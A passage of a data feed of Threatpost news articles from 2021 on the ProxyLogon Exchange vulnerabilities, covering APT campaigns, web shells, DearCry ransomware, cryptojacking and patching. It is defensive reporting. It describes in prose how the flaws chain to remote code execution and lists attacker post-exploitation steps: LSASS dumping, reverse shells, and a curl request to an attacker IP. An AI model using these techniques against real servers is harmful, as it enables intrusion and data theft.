a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched following bugs this week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. \u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. \u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTS besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.\n\nAnd indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## **Rapidly Spreading Email Server Attacks**\n\nMicrosoft said last week that the attacks were \u201climited and targeted.\u201d But that\u2019s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.\n\nESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and Winnti Group.\n\n\u201cOn Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,\u201d according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). \u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nAnd, it saw another cluster of activity targeting around 650 servers, mostly in the Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. \u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premise Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowick, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": "https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continue to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. \u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both 